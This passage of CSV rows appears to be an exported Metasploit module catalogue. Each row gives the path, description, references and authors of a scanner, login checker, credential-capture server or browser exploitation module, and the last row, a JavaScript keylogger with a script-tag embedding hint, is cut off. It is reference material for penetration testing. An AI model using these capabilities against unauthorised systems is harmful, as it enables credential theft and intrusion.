1690,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/options_tcp.rb","auxiliary","scanner/sip/options_tcp","auxiliary/scanner/sip/options_tcp","SIP Endpoint Scanner (TCP)",300,"Scan for SIP devices using OPTIONS requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
1691,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb","auxiliary","scanner/sip/sipdroid_ext_enum","auxiliary/scanner/sip/sipdroid_ext_enum","SIPDroid Extension Grabber",300,"This module exploits a leak of the extension/SIP gateway on SIPDroid 1.6.1 beta, 2.0.1 beta and 2.2 beta (tested on Android 2.1 and 2.2, official Motorola release); other versions may be affected.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-47710, URL-http://seclists.org/fulldisclosure/2011/May/83","Anibal Aguiar "
1692,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/pipe_auditor.rb","auxiliary","scanner/smb/pipe_auditor","auxiliary/scanner/smb/pipe_auditor","SMB Session Pipe Auditor",300,"Determine what named pipes are accessible over SMB","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
1693,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb","auxiliary","scanner/smb/pipe_dcerpc_auditor","auxiliary/scanner/smb/pipe_dcerpc_auditor","SMB Session Pipe DCERPC Auditor",300,"Determine what DCERPC services are accessible over an SMB pipe","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
1694,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb","auxiliary","scanner/smb/psexec_loggedin_users","auxiliary/scanner/smb/psexec_loggedin_users","Microsoft Windows Authenticated Logged In Users Enumeration",300,"This module uses a valid administrator username and password to enumerate users currently logged in, using a technique similar to the ""psexec"" utility provided by SysInternals. It uses reg.exe to query the HKU base registry key.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx, URL-http://www.pentestgeek.com/2012/11/05/finding-logged-in-users-metasploit-module/","Royce Davis @R3dy__ "
1695,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb2.rb","auxiliary","scanner/smb/smb2","auxiliary/scanner/smb/smb2","SMB 2.0 Protocol Detection",300,"Detect systems that support the SMB 2.0 protocol","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
1696,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_enumshares.rb","auxiliary","scanner/smb/smb_enumshares","auxiliary/scanner/smb/smb_enumshares","SMB Share Enumeration",300,"Determine what shares are provided by the SMB service","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
1697,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_enumusers.rb","auxiliary","scanner/smb/smb_enumusers","auxiliary/scanner/smb/smb_enumusers","SMB User Enumeration (SAM EnumUsers)",300,"Determine what local users exist via the SAM RPC service","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
1698,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb","auxiliary","scanner/smb/smb_enumusers_domain","auxiliary/scanner/smb/smb_enumusers_domain","SMB Domain User Enumeration",300,"Determine what domain users are logged into a remote system via a DCERPC call to NetWkstaUserEnum.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/aa370669%28VS.85%29.aspx","natron "
1699,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_login.rb","auxiliary","scanner/smb/smb_login","auxiliary/scanner/smb/smb_login","SMB Login Check Scanner",300,"This module will test an SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0506","Ben Campbell , tebo "
1700,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_lookupsid.rb","auxiliary","scanner/smb/smb_lookupsid","auxiliary/scanner/smb/smb_lookupsid","SMB Local User Enumeration (LookupSid)",300,"Determine what users exist via brute force SID lookups. This module can enumerate both local and domain accounts by setting ACTION to either LOCAL or DOMAIN","Metasploit Framework License (BSD)","f",,,"LOCAL","aggressive","t",,"hdm "
1701,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_version.rb","auxiliary","scanner/smb/smb_version","auxiliary/scanner/smb/smb_version","SMB Version Detection",300,"Display version information about each system","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
1702,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smtp/smtp_enum.rb","auxiliary","scanner/smtp/smtp_enum","auxiliary/scanner/smtp/smtp_enum","SMTP User Enumeration Utility",300,"The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual addresses of user aliases and mailing lists). Using these SMTP commands can reveal a list of valid users.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0531, OSVDB-12551, URL-http://www.ietf.org/rfc/rfc2821.txt","==[ Alligator Security Team ]==, Heyder Andrade "
1703,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smtp/smtp_version.rb","auxiliary","scanner/smtp/smtp_version","auxiliary/scanner/smtp/smtp_version","SMTP Banner Grabber",300,"SMTP Banner Grabber","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc2821.txt","CG "
1704,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/aix_version.rb","auxiliary","scanner/snmp/aix_version","auxiliary/scanner/snmp/aix_version","AIX SNMP Scanner Auxiliary Module",300,"AIX SNMP Scanner Auxiliary Module","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Adriano Lima , Ramon de C Valle "
1705,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb","auxiliary","scanner/snmp/cisco_config_tftp","auxiliary/scanner/snmp/cisco_config_tftp","Cisco IOS SNMP Configuration Grabber (TFTP)",300,"This module will download the startup or running configuration from a Cisco IOS device using SNMP and TFTP. A read-write SNMP community is required. The SNMP community scanner module can assist in identifying a read-write community. The target must be able to connect back to the Metasploit system, and the use of NAT will cause the TFTP transfer to fail.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , pello "
1706,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/cisco_upload_file.rb","auxiliary","scanner/snmp/cisco_upload_file","auxiliary/scanner/snmp/cisco_upload_file","Cisco IOS SNMP File Upload (TFTP)",300,"This module will copy a file to a Cisco IOS device using SNMP and TFTP. A read-write SNMP community is required. The SNMP community scanner module can assist in identifying a read-write community. The target must be able to connect back to the Metasploit system, and the use of NAT will cause the TFTP transfer to fail.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"pello "
1707,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_enum.rb","auxiliary","scanner/snmp/snmp_enum","auxiliary/scanner/snmp/snmp_enum","SNMP Enumeration Module",300,"This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is ""public"".","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol, URL-http://net-snmp.sourceforge.net/docs/man/snmpwalk.html, URL-http://www.nothink.org/perl/snmpcheck/","Matteo Cantoni "
1708,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_enumshares.rb","auxiliary","scanner/snmp/snmp_enumshares","auxiliary/scanner/snmp/snmp_enumshares","SNMP Windows SMB Share Enumeration",300,"This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"tebo "
1709,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_enumusers.rb","auxiliary","scanner/snmp/snmp_enumusers","auxiliary/scanner/snmp/snmp_enumusers","SNMP Windows Username Enumeration",300,"This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"tebo "
1710,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_login.rb","auxiliary","scanner/snmp/snmp_login","auxiliary/scanner/snmp/snmp_login","SNMP Community Scanner",300,"Scan for SNMP devices using common community names","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0508","hdm "
1711,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_set.rb","auxiliary","scanner/snmp/snmp_set","auxiliary/scanner/snmp/snmp_set","SNMP Set Module",300,"This module, similar to the snmpset tool, uses the SNMP SET request to set information on a network entity. An OID (numeric notation) and a value are required. The target device must permit write access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol, URL-http://www.net-snmp.org/docs/man/snmpset.html, URL-http://www.oid-info.com/","Matteo Cantoni "
1712,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb","auxiliary","scanner/snmp/xerox_workcentre_enumusers","auxiliary/scanner/snmp/xerox_workcentre_enumusers","Xerox WorkCentre User Enumeration (SNMP)",300,"This module will do user enumeration based on the Xerox WorkCentre present on the network. SNMP is used to extract the usernames.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"pello "
1713,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb","auxiliary","scanner/ssh/ssh_identify_pubkeys","auxiliary/scanner/ssh/ssh_identify_pubkeys","SSH Public Key Acceptance Scanner",300,"This module can determine what public keys are configured for key-based authentication across a range of machines, users, and sets of known keys. The SSH protocol indicates whether a particular key is accepted prior to the client performing the actual signed authentication request. To use this module, a text file containing one or more SSH keys should be provided. These can be private or public, so long as no passphrase is set on the private keys. 
If you have loaded a database plugin and connected to a database this module will record authorized public keys and hosts so you can track your process. Key files may be a single public (unencrypted) key, or several public keys concatenated together as an ASCII text file. Non-key data should be silently ignored. Private keys will only utilize the public key component stored within the key file.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , todb " 1714,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_login.rb","auxiliary","scanner/ssh/ssh_login","auxiliary/scanner/ssh/ssh_login","SSH Login Check Scanner",300,"This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","todb " 1715,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb","auxiliary","scanner/ssh/ssh_login_pubkey","auxiliary/scanner/ssh/ssh_login_pubkey","SSH Public Key Login Scanner",300,"This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Note that password-protected key files will not function with this module -- it is designed specifically for unencrypted (passwordless) keys. Key files may be a single private (unencrypted) key, or several private keys concatenated together as an ASCII text file. 
Non-key data should be silently ignored.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"todb " 1716,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_version.rb","auxiliary","scanner/ssh/ssh_version","auxiliary/scanner/ssh/ssh_version","SSH Version Scanner",300,"Detect SSH Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/SecureShell","Daniel van Eeden " 1717,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telephony/wardial.rb","auxiliary","scanner/telephony/wardial","auxiliary/scanner/telephony/wardial","Wardialer",300,"Scan for dial-up systems that are connected to modems and answer telephony indials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"I)ruid " 1718,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb","auxiliary","scanner/telnet/lantronix_telnet_password","auxiliary/scanner/telnet/lantronix_telnet_password","Lantronix Telnet Password Recovery",300,"This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port (30718/udp, enabled by default) and extracts the telnet password. 
It has been tested successfully on a Lantronix Device Server with software version V5.8.0.1.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"jgor" 1719,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb","auxiliary","scanner/telnet/lantronix_telnet_version","auxiliary/scanner/telnet/lantronix_telnet_version","Lantronix Telnet Service Banner Detection",300,"Detect Lantronix telnet services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1720,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb","auxiliary","scanner/telnet/telnet_encrypt_overflow","auxiliary/scanner/telnet/telnet_encrypt_overflow","Telnet Service Encyption Key ID Overflow Detection",300,"Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-51182, CVE-2011-4862, EDB-18280, URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons","Jaime Penalba Estebanez , hdm " 1721,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_login.rb","auxiliary","scanner/telnet/telnet_login","auxiliary/scanner/telnet/telnet_login","Telnet Login Check Scanner",300,"This module will test a telnet login on a range of machines and report successful logins. 
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","egypt " 1722,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb","auxiliary","scanner/telnet/telnet_ruggedcom","auxiliary/scanner/telnet/telnet_ruggedcom","RuggedCom Telnet Password Generator",300,"This module will calculate the password for the hard-coded hidden username ""factory"" in the RuggedCom Rugged Operating System (ROS). The password is dynamically generated based on the devices MAC address.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-1803, EDB-18779, US-CERT-VU-889195","Borja Merino , jc" 1723,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_version.rb","auxiliary","scanner/telnet/telnet_version","auxiliary/scanner/telnet/telnet_version","Telnet Service Banner Detection",300,"Detect telnet services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1724,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb","auxiliary","scanner/tftp/ipswitch_whatsupgold_tftp","auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp","IpSwitch WhatsUp Gold TFTP Directory Traversal",300,"This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Gold's TFTP service.","Metasploit Framework License (BSD)","f","2011-12-12 00:00:00",,,"aggressive","t","BID-50890, EDB-18189, OSVDB-77455, URL-http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt","Prabhu S Angadi, juan vazquez , sinn3r " 1725,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/tftp/netdecision_tftp.rb","auxiliary","scanner/tftp/netdecision_tftp","auxiliary/scanner/tftp/netdecision_tftp","NetDecision 4.2 TFTP Directory 
Traversal",300,"This modules exploits a directory traversal vulnerability in NetDecision 4.2 TFTP service.","Metasploit Framework License (BSD)","f","2009-05-16 00:00:00",,,"aggressive","t","BID-35002, CVE-2009-1730, OSVDB-54607","Rob Kraus, juan vazquez " 1726,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/tftp/tftpbrute.rb","auxiliary","scanner/tftp/tftpbrute","auxiliary/scanner/tftp/tftpbrute","TFTP Brute Forcer",300,"This module uses a dictionary to brute force valid TFTP image names from a TFTP server.","BSD License","f",,,,"aggressive","t",,"antoine" 1727,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/upnp/ssdp_msearch.rb","auxiliary","scanner/upnp/ssdp_msearch","auxiliary/scanner/upnp/ssdp_msearch","UPnP SSDP M-SEARCH Information Discovery",300,"Discover information from UPnP-enabled systems","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , todb " 1728,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/esx_fingerprint.rb","auxiliary","scanner/vmware/esx_fingerprint","auxiliary/scanner/vmware/esx_fingerprint","VMWare ESX/ESXi Fingerprint Scanner",300,"This module accesses the web API interfaces for VMware ESX/ESXi servers and attempts to identify version information for that server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1729,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmauthd_login.rb","auxiliary","scanner/vmware/vmauthd_login","auxiliary/scanner/vmware/vmauthd_login","VMWare Authentication Daemon Login Scanner",300,"This module will test vmauthd logins on a range of machines and report successful logins.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","theLightCosine " 1730,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmauthd_version.rb","auxiliary","scanner/vmware/vmauthd_version","auxiliary/scanner/vmware/vmauthd_version","VMWare Authentication Daemon Version Scanner",300,"This module will identify information about a host through the vmauthd service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1731,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb","auxiliary","scanner/vmware/vmware_enum_permissions","auxiliary/scanner/vmware/vmware_enum_permissions","VMWare Enumerate Permissions",300,"This module will log into the Web API of VMWare and try to enumerate all the user/group permissions. Unlike enum suers this is only users and groups that specifically have permissions defined within the VMware product","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1732,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb","auxiliary","scanner/vmware/vmware_enum_sessions","auxiliary/scanner/vmware/vmware_enum_sessions","VMWare Enumerate Active Sessions",300,"This module will log into the Web API of VMWare and try to enumerate all the login sessions.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1733,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_users.rb","auxiliary","scanner/vmware/vmware_enum_users","auxiliary/scanner/vmware/vmware_enum_users","VMWare Enumerate User Accounts",300,"This module will log into the Web API of VMWare and try to enumerate all the user accounts. 
If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1734,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb","auxiliary","scanner/vmware/vmware_enum_vms","auxiliary/scanner/vmware/vmware_enum_vms","VMWare Enumerate Virtual Machines",300,"This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1735,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_host_details.rb","auxiliary","scanner/vmware/vmware_host_details","auxiliary/scanner/vmware/vmware_host_details","VMWare Enumerate Host Details",300,"This module attempts to enumerate information about the host systems through the VMWare web API. This can include information about the hardware installed on the host machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1736,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_http_login.rb","auxiliary","scanner/vmware/vmware_http_login","auxiliary/scanner/vmware/vmware_http_login","VMWare Web Login Scanner",300,"This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","theLightCosine " 1737,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb","auxiliary","scanner/vmware/vmware_screenshot_stealer","auxiliary/scanner/vmware/vmware_screenshot_stealer","VMWare Screenshot Stealer",300,"This module uses supplied login credentials to connect to VMWare via the web interface. 
It then searches through the datastores looking for screenshots. It will downlaod any screenshots it finds and save them as loot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1738,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vnc/vnc_login.rb","auxiliary","scanner/vnc/vnc_login","auxiliary/scanner/vnc/vnc_login","VNC Authentication Scanner",300,"This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, and 3.8 using the VNC challenge response authentication method.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0506","carstein , jduck " 1739,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vnc/vnc_none_auth.rb","auxiliary","scanner/vnc/vnc_none_auth","auxiliary/scanner/vnc/vnc_none_auth","VNC Authentication None Detection",300,"Detect VNC servers that support the ""None"" authentication method.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/RFB, URL-http://en.wikipedia.org/wiki/Vnc","Matteo Cantoni , jduck " 1740,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/voice/recorder.rb","auxiliary","scanner/voice/recorder","auxiliary/scanner/voice/recorder","Telephone Line Voice Scanner",300,"This module dials a range of phone numbers and records audio from each answered call","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1741,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb","auxiliary","scanner/vxworks/wdbrpc_bootline","auxiliary/scanner/vxworks/wdbrpc_bootline","VxWorks WDB Agent Boot Parameter Scanner",300,"Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory","Metasploit Framework License 
(BSD)","f",,,,"aggressive","t","URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1742,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb","auxiliary","scanner/vxworks/wdbrpc_version","auxiliary/scanner/vxworks/wdbrpc_version","VxWorks WDB Agent Version Scanner",300,"Scan for exposed VxWorks wdbrpc daemons","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1743,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb","auxiliary","scanner/winrm/winrm_auth_methods","auxiliary/scanner/winrm/winrm_auth_methods","WinRM Authentication Method Detection",300,"This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"thelightcosine" 1744,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_cmd.rb","auxiliary","scanner/winrm/winrm_cmd","auxiliary/scanner/winrm/winrm_cmd","WinRM Command Runner",300,"This module runs arbitrary Windows commands using the WinRM Service","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"thelightcosine" 1745,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_login.rb","auxiliary","scanner/winrm/winrm_login","auxiliary/scanner/winrm/winrm_login","WinRM Login Utility",300,"This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the 'AllowUnencrypted' winrm option must be set. 
Otherwise adjust the port and set the SSL options in the module as appropriate.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","thelightcosine" 1746,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/winrm/winrm_wql.rb","auxiliary","scanner/winrm/winrm_wql","auxiliary/scanner/winrm/winrm_wql","WinRM WQL Query Runner",300,"This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. Please note in order to use this module, the 'AllowUnencrypted' winrm option must be set.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"thelightcosine" 1747,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/x11/open_x11.rb","auxiliary","scanner/x11/open_x11","auxiliary/scanner/x11/open_x11","X11 No-Auth Scanner",300,"This module scans for X11 servers that allow anyone to connect without authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0526, OSVDB-309","tebo " 1748,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/browser_autopwn.rb","auxiliary","server/browser_autopwn","auxiliary/server/browser_autopwn","HTTP Client Automatic Exploiter",300,"This module has three actions. The first (and the default) is 'WebServer' which uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. Next is 'DefangedDetection' which does only the fingerprinting part. Lastly, 'list' simply prints the names of all exploit modules that would be used by the WebServer action given the current MATCH and EXCLUDE options. 
Also adds a 'list' command which is the same as running with ACTION=list.","BSD License","f",,,"WebServer","passive","t",,"egypt " 1749,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/drda.rb","auxiliary","server/capture/drda","auxiliary/server/capture/drda","Authentication Capture: DRDA (DB2, Informix, Derby)",300,"This module provides a fake DRDA (DB2, Informix, Derby) server that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1750,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/ftp.rb","auxiliary","server/capture/ftp","auxiliary/server/capture/ftp","Authentication Capture: FTP",300,"This module provides a fake FTP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1751,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http.rb","auxiliary","server/capture/http","auxiliary/server/capture/http","Authentication Capture: HTTP",300,"This module provides a fake HTTP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1752,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http_basic.rb","auxiliary","server/capture/http_basic","auxiliary/server/capture/http_basic","HTTP Client Basic Authentication Credential Collector",300,"This module responds to all requests for resources with a HTTP 401. This should cause most browsers to prompt for a credential. If the user enters Basic Auth creds they are sent to the console. This may be helpful in some phishing expeditions where it is possible to embed a resource into a page. 
This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"saint patrick " 1753,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http_javascript_keylogger.rb","auxiliary","server/capture/http_javascript_keylogger","auxiliary/server/capture/http_javascript_keylogger","Capture: HTTP JavaScript Keylogger",300,"This modules runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. Future improvements will allow for a configurable template to be used with this module. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to ""test"", the following URL will load this script into the calling site: http://server:port/test/anything.js","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Marcus J. 
